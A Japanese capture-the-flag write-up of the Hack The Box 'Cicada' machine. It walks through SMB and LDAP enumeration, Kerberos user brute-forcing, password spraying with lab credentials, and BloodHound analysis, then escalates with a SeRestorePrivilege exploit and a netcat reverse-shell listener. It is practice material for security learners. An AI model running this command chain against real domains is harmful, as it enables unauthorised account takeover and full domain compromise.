初めに
本記事は Hack The Box(以下リンク参照) の「Cicada」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.11.35 --top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.35:53
Open 10.10.11.35:88
Open 10.10.11.35:139
Open 10.10.11.35:135
Open 10.10.11.35:389
Open 10.10.11.35:445
Open 10.10.11.35:464
Open 10.10.11.35:593
Open 10.10.11.35:636
Open 10.10.11.35:3268
Open 10.10.11.35:3269
Open 10.10.11.35:5985
Open 10.10.11.35:50997
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 07:29 EDT
Initiating Ping Scan at 07:29
Scanning 10.10.11.35 [4 ports]
Completed Ping Scan at 07:29, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:29
Completed Parallel DNS resolution of 1 host. at 07:29, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:29
Scanning 10.10.11.35 [13 ports]
Discovered open port 53/tcp on 10.10.11.35
Discovered open port 445/tcp on 10.10.11.35
Discovered open port 139/tcp on 10.10.11.35
Discovered open port 464/tcp on 10.10.11.35
Discovered open port 135/tcp on 10.10.11.35
Discovered open port 389/tcp on 10.10.11.35
Discovered open port 50997/tcp on 10.10.11.35
Discovered open port 3269/tcp on 10.10.11.35
Discovered open port 88/tcp on 10.10.11.35
Discovered open port 5985/tcp on 10.10.11.35
Discovered open port 593/tcp on 10.10.11.35
Discovered open port 636/tcp on 10.10.11.35
Discovered open port 3268/tcp on 10.10.11.35
Completed SYN Stealth Scan at 07:29, 0.42s elapsed (13 total ports)
Nmap scan report for 10.10.11.35
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-10-09 07:29:42 EDT for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
50997/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
Raw packets sent: 17 (724B) | Rcvd: 15 (660B)
WindowsのPortが開いている。HTTP系のブラウザを扱うサービスはなさそう。
ドメイン情報収集
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(root㉿kali)-[~/work]
└─# nmap -p 389 -n -Pn --script ldap-rootdse 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 07:26 EDT
Nmap scan report for 10.10.11.35
Host is up (0.19s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=cicada,DC=htb
| ldapServiceName: cicada.htb:cicada-dc$@CICADA.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cicada,DC=htb
| serverName: CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=cicada,DC=htb
| namingContexts: DC=cicada,DC=htb
| namingContexts: CN=Configuration,DC=cicada,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=cicada,DC=htb
| namingContexts: DC=DomainDnsZones,DC=cicada,DC=htb
| namingContexts: DC=ForestDnsZones,DC=cicada,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 196755
| dsServiceName: CN=NTDS Settings,CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
| dnsHostName: CICADA-DC.cicada.htb
| defaultNamingContext: DC=cicada,DC=htb
| currentTime: 20241009182630.0Z
|_ configurationNamingContext: CN=Configuration,DC=cicada,DC=htb
Service Info: Host: CICADA-DC; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
cicada.htbのドメイン情報を掴むことが出来た。この情報を/etc/hostsに以下のように登録しておく。
10.10.11.35 cicada.htb
enum4linuxも回しておく
┌──(root㉿kali)-[~/work]
└─# enum4linux 10.10.11.35
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct 9 07:27:20 2024
=========================================( Target Information )=========================================
Target ........... 10.10.11.35
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.35 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.11.35 )================================
Looking up status of 10.10.11.35
No reply from 10.10.11.35
====================================( Session Check on 10.10.11.35 )====================================
[+] Server 10.10.11.35 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.11.35 )=================================
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.35 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.35 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
========================================( Users on 10.10.11.35 )========================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==================================( Share Enumeration on 10.10.11.35 )==================================
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.35
============================( Password Policy Information for 10.10.11.35 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.11.35 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.35)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.11.35 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 10.10.11.35 via RID cycling (RIDS: 500-550,1000-1050) )===================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
================================( Getting printer info for 10.10.11.35 )================================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Oct 9 07:28:15 2024
特段いい情報はない。
SMB enum
SMBを掘り下げておく。
┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.10.11.35
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
共有階層が見えるのでここに何かしら情報があると思い、列挙してみる。
まずはDEV階層
┌──(root㉿kali)-[~]
└─# smbclient -N //10.10.11.35/DEV
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
権限なさそうなのでHR階層
┌──(root㉿kali)-[~]
└─# smbclient -N //10.10.11.35/HR
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 324720 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
HR.txtがあったのでこの中身を確認してみる。
┌──(root㉿kali)-[~/work]
└─# cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
このパスワードを使う感じがしますね。ならユーザを列挙していきます。
その前にLDAP searchで見えるか確認します。
LDAP enum
┌──(root㉿kali)-[~/work]
└─# ldapsearch -x -v -b "DC=cicada,DC=htb" -H "ldap://10.10.11.35" "(objectclass=*)"
ldap_initialize( ldap://10.10.11.35:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# extended LDIF
#
# LDAPv3
# base <DC=cicada,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
特段何も出てこないですね。
イニシャルアクセス
ユーザ列挙
Kerbrute
AD環境でユーザを列挙してみようとすると命名規則とか色々考慮すべきことはありますが
とりあえずブルフォしときます。最初に思いつくのはkerbruteですね。
┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/Names/names.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop
2024/10/09 07:32:38 > Using KDC(s):
2024/10/09 07:32:38 > 10.10.11.35:88
2024/10/09 07:35:59 > Done! Tested 10177 usernames (0 valid) in 201.244 seconds
このリストではユーザいなさそう。次のリストへ
┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/Names/forenames-india-top1000.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop
2024/10/09 07:36:39 > Using KDC(s):
2024/10/09 07:36:39 > 10.10.11.35:88
2024/10/09 07:37:01 > Done! Tested 1000 usernames (0 valid) in 21.743 seconds
これもいない。次。
┌──(root㉿kali)-[~/work]
└─# kerbrute userenum -d cicada.htb --dc 10.10.11.35 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop
2024/10/09 07:38:03 > Using KDC(s):
2024/10/09 07:38:03 > 10.10.11.35:88
2024/10/09 07:38:04 > [+] VALID USERNAME: administrator@cicada.htb
2024/10/09 07:38:04 > [+] VALID USERNAME: guest@cicada.htb
2024/10/09 07:38:04 > Done! Tested 17 usernames (2 valid) in 0.403 seconds
デフォのGUESTユーザがいる。有効ならそのままRID-brute使えるかも。
RID Brute
でましたUser!これを以下のようにリスト化してパスワードスプレー用に使います。
┌──(root㉿kali)-[~/work]
└─# cat users.txt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
パスワードスプレー
これをさっきのPasswordを使って認証を通せるか確認します。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
michael.wrightsonで通りました!これでもしかしたらさっきのDEVが見えるかもしれないので共有階層の権限をそのままcrackmapで確認します。
見えそうにないですね。
じゃ、この資格情報を使ってRustHound回したいと思います。
横展開
Bloodhound
Bloodhound-Pythonを使ってもいいんですが、今回はRusthound使います。
┌──(root㉿kali)-[/opt/RustHound]
└─# ./rusthound_musl -d cicada.htb -i 10.10.11.35 -u michael.wrightson@cicada.htb -p 'Cicada$M6Corpb*@Lp#nZp!8' -z --adcs
---------------------------------------------------
Initializing RustHound at 07:46:42 on 10/09/24
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2024-10-09T11:46:42Z INFO rusthound] Verbosity level: Info
[2024-10-09T11:46:42Z INFO rusthound::ldap] Connected to CICADA.HTB Active Directory!
[2024-10-09T11:46:42Z INFO rusthound::ldap] Starting data collection...
[2024-10-09T11:46:44Z INFO rusthound::ldap] All data collected for NamingContext DC=cicada,DC=htb
[2024-10-09T11:46:44Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=cicada,DC=htb
[2024-10-09T11:46:44Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2024-10-09T11:46:44Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2024-10-09T11:46:44Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2024-10-09T11:46:44Z INFO rusthound::json::checker] Starting checker to replace some values...
[2024-10-09T11:46:44Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2024-10-09T11:46:44Z INFO rusthound::modules] Starting checker for ADCS values...
[2024-10-09T11:46:44Z INFO rusthound::modules] Checking for ADCS values finished!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 9 users parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 62 groups parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 1 computers parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 2 ous parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 1 domains parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 3 gpos parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 21 containers parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 0 cas parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] 33 templates parsed!
[2024-10-09T11:46:44Z INFO rusthound::json::maker] .//20241009074644_cicada-htb_rusthound.zip created!
RustHound Enumeration Completed at 07:46:44 on 10/09/24! Happy Graphing!
以下コマンドを用いてBloodhound起動します。
┌──(root㉿kali)-[~/work]
└─# neo4j console
# 別ターミナル
┌──(root㉿kali)-[~/work]
└─# bloodhound
rusthoundで作成したZIPファイルを食わせて、情報を探っていきます。
とりあえず以下のユーザディスクリプションを列挙するクエリをbloodhound画面の下部「Raw Query」に打ちます。
MATCH (u:User) WHERE u.description IS NOT NULL RETURN u
krbtgtやadministratorは基本的にビルドインで、デフォルトで書いてあるはずなのでそこまで気にしないのですが、david.oreliousさんに何か書いてます。
これはパスワードかな?
パスワードスプレー
先ほどのパスワードを確認してみます。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' -d cicada.htb --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\michael.wrightson:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
認証成功しました!これで別ユーザのクレデンシャル情報を取得できました。
DEV階層が見えるか確認します。
お、見えそうですね。
smbclient
んじゃDEVに入っていきます。
┌──(root㉿kali)-[~/work]
└─# smbclient //10.10.11.35/DEV -U david.orelious --password='aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 332897 blocks available
smb: \> prompt off
smb: \> mget Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \>
スクリプトがあったので中身を確認します。
emily.oscarsの資格情報ぽいので確認してみます。ここまで横展開したらwinrmで取れると思ったのでこっちで確認します。
いけそう。
はい。これでシェルとれました!ユーザフラグゲットです!
権限昇格
whoami /priv
とりあえずこれを確認します。
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users>
直ぐ管理者権限取れそう。SeBackupPrivilegeは以下のBlackfieldで悪用したので今回はSeRestorePrivilegeを悪用しようと思います。
SeRestorePrivilege
以下の悪用バイナリを利用します。
コンパイル後に転送します。nc.exeも送っときます。nc.exeは/usr/share/windows-binariesとかそこらのPath(多分)にKaliデフォルトであるので利用します。
あとは以下の待ち受けを用意しておきます。
┌──(root㉿kali)-[~/work]
└─# nc -lnvp 4444
レッツ権限昇格!
特権とれました。これでルートフラグゲットです。
まとめ
これで特権昇格に成功し、Administrator権限奪取に成功しました。
ユーザフラグまでちょいと長かったですが、AD環境侵害のいい練習になるBOXかなと思いました。
ラビットホールも特段ないのでAD初心者にお勧めです。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。